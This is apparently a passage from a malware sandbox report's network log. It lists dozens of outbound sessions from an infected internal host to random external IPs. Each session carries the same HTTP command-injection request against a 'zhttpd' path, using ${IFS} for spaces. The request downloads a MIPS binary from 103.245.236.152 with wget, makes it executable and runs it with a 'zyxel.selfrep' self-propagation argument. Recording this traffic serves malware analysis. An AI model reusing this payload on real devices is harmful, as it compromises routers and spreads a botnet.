                                      Jan 14, 2024 15:50:12.844461918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      383192.168.2.1460946171.109.179.130443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:12.844518900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      384192.168.2.143749251.77.191.217443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:12.844551086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      385192.168.2.1441616117.22.101.175443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:12.844645023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      386192.168.2.143324063.115.90.197443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:12.844688892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      387192.168.2.1435398122.230.6.80443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:12.844777107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      388192.168.2.145980439.122.36.2443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:12.844804049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      389192.168.2.1446476110.103.192.9443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:12.844872952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      390192.168.2.1441172174.180.166.110443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:12.844922066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      391192.168.2.1444296189.198.223.56443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:12.844974995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      392192.168.2.1443996217.168.253.178443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:12.845051050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      393192.168.2.1437276123.154.49.105443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:12.845113039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      394192.168.2.145223425.133.206.254443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:12.845192909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      395192.168.2.1443340103.198.80.16443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:12.845288038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      396192.168.2.1447386119.170.235.250443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:12.845362902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      397192.168.2.145676290.132.206.175443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:12.845413923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      398192.168.2.145619065.6.38.237443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:12.845493078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      399192.168.2.1448932142.175.4.56443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:12.845563889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      400192.168.2.145996638.153.117.24443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:12.845658064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      401192.168.2.1452174115.188.244.180443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:12.845730066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      402192.168.2.145055234.97.133.164443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:12.845813036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      403192.168.2.144460243.6.162.70443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:12.845871925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      404192.168.2.144874062.186.9.142443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:12.845948935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      405192.168.2.1447586103.65.230.165443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:12.845998049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      406192.168.2.1460172109.154.91.169443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:12.846035957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      407192.168.2.145833698.154.198.226443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:12.846101046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      408192.168.2.144362413.19.173.118443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:12.846159935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      409192.168.2.14463764.223.244.186443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:12.846250057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      410192.168.2.1442492151.175.82.161443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:12.846353054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      411192.168.2.1441064150.76.49.104443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:12.846425056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      412192.168.2.1445586176.59.179.11443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:12.846487045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      413192.168.2.1451210220.118.33.17443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:12.846606016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      414192.168.2.1444006146.96.212.164443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:12.846632004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      415192.168.2.1434324221.64.100.63443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:12.846743107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      416192.168.2.1451498166.45.153.165443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:12.846795082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      417192.168.2.144498872.44.176.130443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:12.846880913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      418192.168.2.1460770191.81.98.63443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:12.846956015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      419192.168.2.1444790147.28.251.92443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:12.847024918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      420192.168.2.1443472144.129.75.128443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:12.847069979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      421192.168.2.143424644.225.142.95443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:12.847121000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      422192.168.2.1449002139.235.63.254443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:12.847182035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      423192.168.2.1457184107.224.86.163443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:12.847256899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      424192.168.2.1459736110.224.29.64443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:12.847357035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      425192.168.2.1439686138.146.199.71443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:12.847400904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      426192.168.2.14420165.240.85.18443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:12.847491026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      427192.168.2.1440586117.144.151.100443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:12.847567081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      428192.168.2.1448818171.71.92.224443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:12.847656965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      429192.168.2.1438662144.156.159.53443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:12.847738981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      430192.168.2.1452032195.31.240.127443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:12.847812891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      431192.168.2.1451592111.192.217.56443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:12.847872972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      432192.168.2.1440568189.137.191.183443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:12.847969055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      433192.168.2.1460352202.118.198.208443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:12.848037004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      434192.168.2.1452758196.158.159.78443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:12.848093033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      435192.168.2.1455328136.162.72.9443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:12.848148108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      436192.168.2.1435116140.106.188.121443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:12.848246098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      437192.168.2.1452390146.194.140.216443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:12.848288059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      438192.168.2.1457106174.75.7.79443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:12.848357916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      439192.168.2.144773289.26.164.221443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:12.848417044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      440192.168.2.144041848.191.42.45443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:12.848464966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      441192.168.2.1456404129.145.181.221443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:12.848540068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      442192.168.2.14603145.253.234.239443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:12.848606110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      443192.168.2.1443464179.81.38.117443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:12.848691940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      444192.168.2.143381041.190.104.211443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:12.848753929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      445192.168.2.143621697.210.40.153443
                                      TimestampBytes transferredDirectionData
